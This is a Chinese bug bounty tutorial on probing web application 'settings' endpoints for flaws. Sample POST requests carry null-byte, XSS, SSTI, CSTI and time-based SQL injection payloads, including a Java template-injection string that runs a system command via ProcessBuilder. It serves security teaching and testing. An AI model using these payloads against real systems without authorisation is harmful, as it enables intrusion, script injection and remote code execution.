漏洞赏金猎人系列-如何测试设置(Setting)功能
漏洞赏金猎人系列-如何测试设置(Setting)功能
声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
正文
本系列主要讲的是设置这个功能的测试,虽然不同的厂商设置这个功能不太一样,但是大体上是一样的,好了,下面开始(其实我都不想发了,有的东西太过骚气,哈哈)
第一种方法
尝试在电子邮件,用户,密码或电话中注入Null,空值或者%00,响应中可能会发生奇怪的事情
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
email , user , pass OR phone=null&token=CSRF
第二种方法
在用户名中尝试注入 '"><svg/onload=prompt('XSS');>{{7*7}}来检测是否存在SQLi , XSS , SSTI 或者 CSTI
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: Number
user , name='"><svg/onload=prompt('XSS');>{{7*7}}& token=CSRF
第三种方法
尝试在用户名中注入SSTI的Payloads: {{7*7}} , {{ '7'*7 }}或者 {{ this }},可能会有一个RCE在等着你==
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
user , name={{7*7}}&token=CSRF
第四种方法
尝试在用户名中注入以下SSTI的Payloads:
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance(). getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
可能会有RCE==
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: Number
user={{'a'.getClass().forName('javax.script.ScriptEngineManager'). newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"netstat\\\");org.apache.co mmons.io.IOUtils.toString(x.start().getInputStream())\")}} &token=CSRF
第五种方法
尝试在用户名中注入以下CSTI的Payloads:
{{'a'.constructor.prototype.charAt=[].join; $eval('x=alert(1)');}}
可能会发现一个XSS
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
user , name={{'a'.constructor.prototype.charAt=[].join; $eval('x=alert(1)');}}&token=CSRF
第六种方法
尝试在用户名中注入SQLi的payloads,比如' or sleep(20)' , -IF(1=1,SLEEP(20),0) AND id='1 OR ' waitfor delay '0:0:30'--
可能有个高危在等着你哦
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
user , name=' or sleep(20)'&token=CSRF
第七种方法
尝试在用户名中注入XSS的payload:
<svg/onload=alert('XSS')> OR <script>alert(document.domain);</script>
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
user , name=<svg/onload=alert('XSS')>&token=CSRF
参考
https://speakerdeck.com/aditya45/abusing-functions-for-bug-bounty
https://verneet.com/fuzzing-77-till-p1/
https://hackerone.com/reports/125980
https://gauravnarwani.com/injecting-6200-to-1200/
https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html
https://hackerone.com/reports/587829
https://hackerone.com/reports/150156
https://whitton.io/articles/uber-turning-self-xss-into-good-xss/